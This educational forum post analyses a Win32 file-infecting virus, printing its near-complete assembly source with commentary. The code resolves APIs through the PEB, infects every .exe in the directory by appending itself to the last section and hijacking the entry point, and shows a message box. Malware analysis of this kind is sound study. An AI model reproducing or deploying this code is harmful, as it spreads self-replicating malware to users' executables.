Continuing the discussion from Understanding a Win32 Virus: Background Material:
Code Analysis
Let’s begin with the first section of the code.
[BITS 32] ; defines 32-bit
%include "win32n.inc"
virStart:
pushad
call CodeStart
CodeStart:
pop ebp
sub ebp,CodeStart
The win32n.inc file simply defines a long list of structs which will be used later. The sequence of calling CodeStart, popping the return address into ebp and then subtracting CodeStart from it is a technique known as the delta offset. The call targets the very next instruction, so the return address it pushes is the address at which CodeStart actually sits in memory at run time. Subtracting the assemble-time address of CodeStart from it leaves the difference between where the code was assembled to run and where it really is. This is especially important because the code will almost certainly sit at a different address in each host it ends up in, so every variable is accessed as [ebp+label] to turn its assemble-time address into a valid run-time address without breaking anything.
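The arithmetic behind the delta offset can be sketched in a few lines of Python. This is only an illustration of the subtraction and addition involved; the addresses below are made-up values, not taken from the virus.

```python
MASK32 = 0xFFFFFFFF  # registers are 32 bits wide, so arithmetic wraps around


def delta_offset(runtime_addr: int, assembled_addr: int) -> int:
    """Value left in ebp after `pop ebp` / `sub ebp, CodeStart`."""
    return (runtime_addr - assembled_addr) & MASK32


def runtime_address(delta: int, assembled_addr: int) -> int:
    """Address that an operand such as [ebp+label] resolves to."""
    return (delta + assembled_addr) & MASK32


# Hypothetical numbers, chosen only for illustration.
ASSEMBLED_CODESTART = 0x00000006  # where the assembler thinks CodeStart is
RUNTIME_CODESTART = 0x00405006    # return address popped at run time
ASSEMBLED_VARIABLE = 0x00000300   # assemble-time address of some variable

delta = delta_offset(RUNTIME_CODESTART, ASSEMBLED_CODESTART)
print(hex(delta))
print(hex(runtime_address(delta, ASSEMBLED_VARIABLE)))
```

With these example values the delta is 0x405000, so a variable assembled at 0x300 is found at 0x405300.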
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Retrieve Kernel base ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx, [fs : 0x30] ; get a pointer to the PEB
mov ebx, [ebx + 0x0C] ; get PEB->Ldr
mov ebx, [ebx + 0x14] ; get PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry)
mov ebx, [ebx] ; 2nd Entry
mov ebx, [ebx] ; 3rd Entry
mov ebx, [ebx + 0x10] ; Get Kernel32 Base
mov [ebp+dwKernelBase] , ebx
This is pretty self-explanatory given the details in the background information section. If we look at the last line, we can see the variable dwKernelBase being accessed through an offset from ebp. Why ebp? If you’ve forgotten already, look at the delta offset code above this extract. Please note that I’ve also listed the offsets for the structs in the previous section.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Retrieve function addresses ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
sub esp , 68 ;save function addresses on the stack
mov ebx , esp
lea edi,[ebp+Kernel_APIs]
mov ecx,16
mov edx,[ebp+dwKernelBase]
push ebp
mov ebp , ebx
call RetrieveAPIs
Here, esp is lowered to reserve space on the stack for the function addresses, which are kept as local variables. The RetrieveAPIs function expects the DLL base in edx, a pointer to the list of hashes of the required functions in edi, the number of functions needed in ecx and a pointer to where the function addresses will be stored in ebp. Since we have 16 kernel32 functions, we require at least 16 * 4 = 64 bytes to store all the addresses. The code reserves 68 bytes, which leaves one extra 4-byte slot at [ebx+64] that is filled in later with the address of MessageBox. Note that ebp (the delta offset) is pushed and temporarily replaced with the address of this storage area before the call. Let’s take a quick look at the RetrieveAPIs function before resuming this section of code.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; RetrieveAPIs ;
; Parameters : DLL base in edx , CRCs Offset in edi , No.of APIs in ecx , Offset to store at in ebp ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
RetrieveAPIs:
push ebx
push esi
mov esi, edx
add esi, [esi+0x3C] ; Start of PE header
mov esi, [esi+0x78] ; RVA of export dir
add esi, edx ; VA of export dir
push esi ; [esp] = VA of export dir
mov esi, [esi+0x20] ; RVA of ENT
add esi, edx ; VA of ENT
xor ebx,ebx
cld
looper:
inc ebx
lodsd
add eax , edx ;eax now points to the string of a function
call GenerateCRC ;eax now holds the hash of our function
cmp dword [edi] , eax
jne looper
mov eax,[esp]
mov eax,[eax+0x24] ;RVA of EOT
add eax,edx ;VA of EOT
movzx eax , word [(ebx-1)*2+eax] ;eax now holds the ordinal of our function
push esi
mov esi,[esp+4]
mov esi,[esi+0x1C] ;RVA of EAT
add esi,edx ;VA of EAT
mov esi,[eax*4+esi] ; use the ordinal * 4 to get the offset to the function address
add esi,edx
mov [ebp] , esi ;save address
pop esi
add edi,4
add ebp,4
dec ecx
jnz looper
pop esi
finished:
pop esi
pop ebx
ret
I’ve covered the necessary material at the end of the previous section. Essentially, this piece of code iterates through kernel32’s export name table, hashes each name with GenerateCRC and compares the result with the hash of the next required function. The search does not restart after a match, so the list of required hashes has to be in the same alphabetical order as the export names. When the two “hashes” match, the index of the name is used to look up the function’s ordinal, and the ordinal is then used as an index into the export address table to obtain the function’s address. The address is stored in the reserved stack space and ebp is incremented by 4 to point to the slot for the next function’s address. Note that there is no bounds check: if a hash never matches, the loop runs past the end of the name table. I won’t worry too much about the specifics of the instructions used but if you wish to know, please leave a comment below and I will explain them. Let’s continue with the previous section of code.
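The name, ordinal and address lookup can be modelled in Python with three plain lists standing in for the export tables. This is a rough sketch under a few assumptions: zlib.crc32 is only a stand-in for GenerateCRC (whose exact algorithm is not shown in this section), the tables and base address are toy values, and a bounds check has been added that the original loop does not have.

```python
import zlib


def name_hash(name: str) -> int:
    # Stand-in for GenerateCRC; the real routine may use a different CRC.
    return zlib.crc32(name.encode("ascii")) & 0xFFFFFFFF


def resolve_exports(base, names, name_ordinals, function_rvas, wanted_hashes):
    """Single forward pass over the name table, like the looper label."""
    resolved = []
    index = 0
    for wanted in wanted_hashes:
        # Advance until the hash of the current export name matches.
        while index < len(names) and name_hash(names[index]) != wanted:
            index += 1
        if index == len(names):
            raise LookupError("hash not found (the listing has no such check)")
        ordinal = name_ordinals[index]                  # name index -> ordinal
        resolved.append(base + function_rvas[ordinal])  # ordinal -> RVA -> VA
        index += 1                                      # search never restarts
    return resolved


# Toy export tables, hypothetical values only.
BASE = 0x10000000
NAMES = ["CloseHandle", "CreateFileA", "ExitProcess", "LoadLibraryA"]
NAME_ORDINALS = [2, 0, 3, 1]
FUNCTION_RVAS = [0x1000, 0x2000, 0x3000, 0x4000]

wanted = [name_hash("CreateFileA"), name_hash("LoadLibraryA")]
addresses = resolve_exports(BASE, NAMES, NAME_ORDINALS, FUNCTION_RVAS, wanted)
print([hex(a) for a in addresses])
```

Because the index only ever moves forward, passing the wanted hashes in the wrong order makes the lookup fail, which is why the ordering of the hash list matters.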
pop ebp
lea edx,[ebp+szUser32] ; "user32.dll"
push edx
call [ebx+36] ; LoadLibrary
mov edx,eax
lea edi,[ebp+User_APIs]
xor ecx,ecx
inc ecx
push ebp
lea ebp , [ebx+64] ; save the function address on the stack here
call RetrieveAPIs ; get MessageBox function address
pop ebp
As we’ve seen in the analysis from the previous article, the payload is a MessageBox but the function does not exist in kernel32. Instead, it’s located in the user32 DLL. The virus needs to perform the same procedure as it did with kernel32 but this time on user32. Since the module is not loaded into the address space by default, it must load it dynamically using the LoadLibrary function first. The address of MessageBox is then stored in the spare slot at [ebx+64]. Now that the virus has all of its required tools, let’s finally analyze the viral routine.
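To make the call [ebx+N] instructions in the rest of the listing easier to follow, here is a small Python lookup of the slot offsets. The names are the ones given in the listing’s comments; slots 0 and 56 are only described there as closing a handle and restoring the file time, so CloseHandle and SetFileTime are my assumption for those two.

```python
# Function address slots, in the order they are stored on the stack.
KERNEL32_SLOTS = [
    "CloseHandle",        # assumed from the "Close ... Handle" comments
    "CreateFile",
    "CreateFileMapping",
    "ExitProcess",
    "FindFirstFile",
    "FindNextFile",
    "FlushViewOfFile",
    "GetFileAttributes",
    "GetFileTime",
    "LoadLibrary",
    "MapViewOfFile",
    "SetEndOfFile",
    "SetFileAttributes",
    "SetFilePointer",
    "SetFileTime",        # assumed from "Restore original file time"
    "UnmapViewOfFile",
]
USER32_SLOTS = ["MessageBox"]
SLOTS = KERNEL32_SLOTS + USER32_SLOTS


def slot_offset(name: str) -> int:
    """Offset N such that `call [ebx+N]` reaches the named function."""
    return SLOTS.index(name) * 4


for name in ("LoadLibrary", "FindFirstFile", "MessageBox"):
    print(name, slot_offset(name))
print("bytes reserved:", len(SLOTS) * 4)
```

The total comes to 68 bytes, which matches the sub esp, 68 at the start of the function retrieval code.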
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Infection routine : Infect all files in the current directory ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
infectFirstFile:
sub esp,324
push esp
lea edx,[ebp+szExe] ; "*.exe"
push edx
call [ebx+16] ; FindFirstFile
inc eax
jz endInfection ; if (FindFirstFile(...) == INVALID_HANDLE_VALUE)
dec eax ; restore return value of FindFirstFile
mov dword [esp+320] , eax ;save search handle
infectNextFile:
call infectFile
push esp
push dword [esp+324]
call [ebx+20] ; FindNextFile
test eax,eax ; if (FindNextFile(...) != FALSE)
jnz infectNextFile ; loop
endInfection:
add esp,324
To infect a file, it must first find a file to infect. FindFirstFile is called with the search pattern *.exe and fills in a WIN32_FIND_DATA struct containing the information of the first matching file in the working directory. If a file is found, it will call infectFile and then keep calling FindNextFile, looping until all matching files have been processed. The 324 bytes reserved on the stack hold the WIN32_FIND_DATA struct, with the search handle stored at offset 320.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; infectFile routine ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
infectFile:
sub esp,48
push ebp
lea ebp,[esp+4]
mov edx , dword [ebp+52+WIN32_FIND_DATA.nFileSizeLow]
mov [ebp+0] , edx
mov [ebp+44] , edx
add dword [ebp+0] , virSize+1000h ;fileSize+virSize+extra work space
lea esi , [ebp+52+WIN32_FIND_DATA.cFileName]
push esi ; lpFileName
call [ebx+28] ;save original attributes; GetFileAttributes
mov [ebp+4] , eax
push dword 0x80 ; dwFileAttributes, FILE_ATTRIBUTE_NORMAL
push esi ; lpFileName
call [ebx+48] ;set to normal , ie clear all attributes: SetFileAttributes
Before attaching its own code to the file, it will first save the original file attributes using GetFileAttributes and then set the file’s attributes to FILE_ATTRIBUTE_NORMAL. I’m assuming that the author decided to do this to make sure the file could be opened for writing in the circumstance that it was read-only.
xor edi,edi
push edi ; hTemplateFile, NULL
push edi ; dwFlagsAndAttributes, NULL
push 3 ; dwCreationDisposition, OPEN_EXISTING
push edi ; lpSecurityAttributes, NULL
push edi ; dwShareMode, 0
push 0xC0000000 ; dwDesiredAccess, GENERIC_READ | GENERIC_WRITE
push esi ; lpFileName, file to be infected
call [ebx+4] ; CreateFile
inc eax
jz done ; if (CreateFile(...) == INVALID_HANDLE_VALUE)
dec eax ; restore return value
mov dword [ebp+8] , eax ; save file handle on local stack
To infect the file, a handle to it must be obtained by calling CreateFile with the GENERIC_READ | GENERIC_WRITE access rights and OPEN_EXISTING, so that only an existing file is opened.
lea edx , [ebp+12] ;
push edx ; lpLastWriteTime
add edx,8
push edx ; lpLastAccessTime
add edx,8
push edx ; lpCreationTime
push eax ; hFile
call [ebx+32] ; GetFileTime
I’m assuming that the call to GetFileTime here saves the file’s original timestamps so that they can be restored after its contents have been modified, in an attempt to leave less forensic evidence.
push edi ; lpName, NULL
push dword [ebp+0] ; dwMaximumSizeLow
push edi ; dwMaximumSizeHigh, 0
push 4 ; flProtect, PAGE_READWRITE
push edi ; lpFileMappingAttributes, NULL
push dword [ebp+8] ; hFile
call [ebx+8] ; CreateFileMapping
mov [ebp+36] , eax ; save handle to mapping on local stack
push dword [ebp] ; dwNumberOfBytesToMap, dwMaximumSizeLow
push edi ; dwFileOffsetLow, 0
push edi ; dwFileOffsetHigh, 0
push 2 ; dwDesiredAccess, FILE_MAP_WRITE
push dword [ebp+36] ; hFileMappingObject
call [ebx+40] ; MapViewOfFile
mov esi,eax
mov edi,eax
mov [ebp+40] , eax ; save pointer to mapped file
Writing to an executable file is a bit more complex than simply appending to it. When the Windows loader sets up the executable in memory, it relies on the structures of the PE format to know what each piece of data is and how much of it to load, so those structures have to be updated as well. To achieve this, the host file is mapped into the process’s address space with read and write access using CreateFileMapping and MapViewOfFile. The mapping is created with the enlarged size stored at [ebp+0] (file size + virSize + 0x1000), which also grows the file on disk to make room for the virus. If you’re having trouble understanding this, just imagine that the host file has been read and then loaded into a buffer.
cmp word [esi] , 'MZ' ; 'MZ' e_magic
jne UnMap
cmp byte [esi+50h] , 't' ;already infected ?
je UnMap
mov byte [esi+50h] , 't' ;marked
add esi , [esi+0x3C] ; move offset of esi to point to PE header
cmp word [esi] , 'PE' ; 'PE' signature
jne UnMap
The next thing to do is to check that the file is a proper PE file by checking the MZ magic and the PE signature. Here, the author has decided to tag an infected file using the letter t at offset 0x50 from the beginning of the file. If the file is already tagged or is not detected as a PE file, the infection process is skipped, which prevents the same file from being infected twice. Note that the tag is written before the PE signature is checked, so an MZ file that is not a PE file still ends up tagged.
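From an analyst’s point of view, the same three checks are a quick way to triage a sample. The sketch below mirrors their order in Python. The function name and return strings are my own, and a t at offset 0x50 is only a hint, since that byte lies inside the DOS header or stub and could hold the same value in a clean file.

```python
import struct

MARKER_OFFSET = 0x50  # offset the listing tests and sets
MARKER_VALUE = ord("t")


def classify(data: bytes) -> str:
    """Apply the listing's checks in the same order, read-only."""
    if len(data) <= MARKER_OFFSET or data[0:2] != b"MZ":
        return "not MZ"
    if data[MARKER_OFFSET] == MARKER_VALUE:
        return "marked"
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # The listing compares only the first two bytes of the signature.
    if data[e_lfanew:e_lfanew + 2] != b"PE":
        return "not PE"
    return "unmarked PE"


# Build a tiny fake header purely for demonstration.
sample = bytearray(0x200)
sample[0:2] = b"MZ"
struct.pack_into("<I", sample, 0x3C, 0x80)  # e_lfanew -> 0x80
sample[0x80:0x84] = b"PE\x00\x00"

print(classify(bytes(sample)))
sample[MARKER_OFFSET] = MARKER_VALUE
print(classify(bytes(sample)))
```

Run against the fake header, this reports the file as an unmarked PE first and as marked once the byte at 0x50 is set.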
mov ecx , esi ;ecx points to start of pe header
movzx edx , word [esi+6] ;no. of sections
dec edx ; sections start with index 0
imul edx , 0x28 ; size of IMAGE_SECTION_HEADER
add esi , 0xF8 ; distance from PE header to first section header
add esi , edx ;esi points to header of the last section
add edi , [esi+14h] ; edi = PointerToRawData
add edi , [esi+8] ;start copying virus at offset : map + pointerToRawData + virtualSize
or dword [esi+0x24] , 00000020h | 20000000h | 80000000h | 80h ;set flags (writable , executable , etc)
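For the viral code to be reachable by EIP, the section it resides in must be executable. We can see that the virus does indeed just append to the end of the last section (as we assumed in the analysis demonstration). The header of the last section is found by skipping 0xF8 bytes from the PE signature (the signature, the file header and a standard 32-bit optional header) and then (NumberOfSections - 1) * 0x28 bytes of section headers. When it has reached that section header, it ORs the Characteristics member with the executable flag IMAGE_SCN_MEM_EXECUTE to allow the CPU to execute the virus, along with IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE and the 0x80 flag (IMAGE_SCN_CNT_UNINITIALIZED_DATA). The write flag is needed because the virus stores variables such as dwKernelBase inside its own body.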
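To make the header arithmetic and the flag mask concrete, here is a small Python sketch that computes where the last section header sits and decodes a Characteristics value. The flag constants come from the PE format; the helper names and the example values (an e_lfanew of 0x80, three sections, a typical data section value of 0xC0000040) are assumptions for illustration.

```python
SECTION_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}

# The mask OR-ed into Characteristics by the listing.
VIRUS_MASK = 0x00000020 | 0x20000000 | 0x80000000 | 0x80


def last_section_header_offset(e_lfanew: int, number_of_sections: int) -> int:
    """File offset of the last IMAGE_SECTION_HEADER (PE32 layout assumed)."""
    return e_lfanew + 0xF8 + (number_of_sections - 1) * 0x28


def describe(characteristics: int) -> list:
    """Names of the known flags set in a Characteristics value."""
    return [name for bit, name in sorted(SECTION_FLAGS.items())
            if characteristics & bit]


print(hex(last_section_header_offset(0x80, 3)))
print(describe(VIRUS_MASK))

before = 0xC0000040  # hypothetical data section: initialized, read, write
after = before | VIRUS_MASK
print(hex(after), describe(after))
```

A last section that is both writable and executable, or one that suddenly carries the code flag, is a classic sign that a file is worth a closer look.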
add dword [esi+8] , virSize ;increase virtual size
mov edx , dword [esi+8] ; edx = VirtualSize
mov dword [ecx+50h] , edx ; SizeOfImage = VirtualSize
mov edx , [esi+0xC] ; edx = VirtualAddress
add dword [ecx+50h] , edx ; SizeOfImage += VirtualAddress (RVA end of section data)
mov eax , dword [ecx+50h] ; eax = RVA end of section data
xor edx , edx
div dword [ecx+38h] ; eax /= SectionAlignment, edx = eax % SectionAlignment (remainder)
mov eax , [ecx+38h] ; eax = SectionAlignment
sub eax , edx ; SectionAlignment -= remainder
add dword [ecx+50h] , eax ;new aligned SizeOfImage
xor edx,edx
mov eax , dword [esi+8] ; eax = VirtualSize
div dword [ecx+3Ch] ; eax /= FileAlignment, edx = eax % FileAlignment (remainder)
mov eax , dword [ecx+3Ch] ; eax = FileAlignment
sub eax , edx ; eax -= remainder
push ecx ; preserve ecx
mov ecx, dword [esi+8] ; ecx = VirtualSize
mov dword [esi+10h] , ecx ; SizeOfRawData = VirtualSize
add dword [esi+10h] , eax ; SizeOfRawData += padding up to the next FileAlignment boundary
mov ecx , dword [esi+10h] ; ecx = new SizeOfRawData
mov dword [ebp+44] , ecx ;save new file size for later call to SetFilePointer
mov ecx , dword [esi+14h] ; ecx = PointerToRawData
add dword [ebp+44] , ecx ; file size = SizeOfRawData + PointerToRawData
pop ecx ; restore ecx
Before adding the malicious code to the file, the program fixes up the headers to account for it. It adds its own size to the last section’s VirtualSize, sets SizeOfImage to the end of that section rounded up to SectionAlignment and sets the section’s SizeOfRawData to the new VirtualSize rounded up to FileAlignment. The author has chosen to save the new file size (PointerToRawData plus the new SizeOfRawData) at [ebp+44] for the later call to SetFilePointer.
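The rounding used in the listing is worth a closer look because it differs slightly from the usual round-up idiom. The Python sketch below reproduces the listing’s arithmetic next to the conventional formula; the function names and sample values are mine.

```python
def align_like_listing(value: int, alignment: int) -> int:
    """value + (alignment - value % alignment), as done with div/sub/add."""
    remainder = value % alignment
    return value + (alignment - remainder)


def align_up(value: int, alignment: int) -> int:
    """Conventional round-up that leaves aligned values untouched."""
    return (value + alignment - 1) // alignment * alignment


# Hypothetical sizes with typical alignments (0x1000 and 0x200).
for value, alignment in ((0x1234, 0x1000), (0x5A0, 0x200), (0x2000, 0x1000)):
    print(hex(value), hex(alignment),
          hex(align_like_listing(value, alignment)),
          hex(align_up(value, alignment)))
```

Both versions agree whenever the value is not already aligned. When it is already a multiple of the alignment, the remainder is zero and the listing’s version adds one full extra alignment unit, so 0x2000 becomes 0x3000 rather than staying at 0x2000.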
mov eax , dword [esi+0xC] ; eax = VirtualAddress
add eax , dword [esi+8] ; eax += VirtualSize
mov edx , dword [ecx+28h] ;save OEP
add edx , dword [ecx+34h] ;Add Image base to OEP
sub eax , virSize ; eax -= virSize (start of virus code)
mov dword [ecx+28h] , eax ;set new entry point
mov esi , virStart ; esi = base of code
add esi , dword [esp] ; esi += delta offset (the ebp saved at the start of infectFile)
mov ecx , virSize ; number of bytes to copy
cld ; set forward direction for rep
rep movsb ;copy virus
sub edi , virSize-(backToHost-virStart)-1 ; OEP placeholder address
mov dword [edi] , edx ;patch OEP
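In the first half of the code here, the OEP (Original Entry Point) is read from AddressOfEntryPoint and the image base is added to it, so that once the virus has finished execution, the infected program can continue its regular routine. The entry point is then replaced with the RVA at which the virus will start (the end of the enlarged section minus virSize). To copy the virus code into the target file using rep movsb, esi is given the run-time address of the beginning of the virus, edi is given the location the data will be copied to and ecx is given the size of the data to copy. Once the virus code has been copied, edi is moved back to the 4-byte operand of the push instruction at backToHost (one byte past the label, after the opcode) and the 'SiGs' placeholder there is overwritten with the actual OEP.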
UnMap:
push dword [ebp+44]
push dword [ebp+40]
call [ebx+24] ;FlushViewOfFile
push dword [ebp+40]
call [ebx+60] ;UnmapViewOfFile
push dword [ebp+36]
call [ebx] ;Close Map Handle
lea edx , [ebp+12]
push edx
add edx,8
push edx
add edx,8
push edx
push dword [ebp+8]
call [ebx+56] ;Restore original file time
push 0
push 0
push dword [ebp+44]
push dword [ebp+8]
call [ebx+52] ;SetFilePointer
push dword [ebp+8]
call [ebx+44] ;SetEndOfFile
push dword [ebp+8]
call [ebx] ;Close File Handle
done:
push dword [ebp+4]
lea edx , [ebp+52+WIN32_FIND_DATA.cFileName]
push edx
call [ebx+48] ;Restore original attributes
pop ebp
add esp,48
ret
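I won’t go through this section of the code in detail since it’s pretty self-explanatory. Essentially, it flushes and unmaps the view, closes the mapping handle, restores the original file times, truncates the file to the size saved at [ebp+44], closes the file handle and restores the original attributes, then returns. For files that were skipped, [ebp+44] still holds the original file size, so the extra space added by the mapping is trimmed off again.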
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Main Payload ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
push 0x10 ; uType; MB_ICONERROR
lea edx,[ebp+szTitle]
push edx ; lpCaption
lea edx,[ebp+szMsg]
push edx ; lpText
push 0 ; hWnd
call [ebx+64] ; MessageBox
cmp dword [ebp+backToHost+1] , 'SiGs' ;first generation ?
jne returnToHost
push 0 ; uExitCode; 0
call [ebx+12] ; ExitProcess
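This is the payload of the virus, i.e. the message box. Afterwards, it checks whether the OEP placeholder at backToHost still holds 'SiGs'. If it does, this is the first generation of the virus, which has no host to return to, so it simply calls ExitProcess.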
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Return to host ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
returnToHost:
add esp , 68
popad ; restore register values from before start of virus
backToHost:
push 'SiGs' ; push OEP
retn ; return to OEP
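Again, this code section is self-explanatory: it releases the 68 bytes of stack used for the function addresses, restores the registers saved by pushad at virStart, then pushes the patched OEP and returns to it.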
Conclusion
This concludes the code analysis of the Win32 Virus. If there’s anything that I’ve missed, please notify me and I will try to correct it ASAP. Otherwise, thanks for reading and I hope you’ve learned something valuable.
– dtm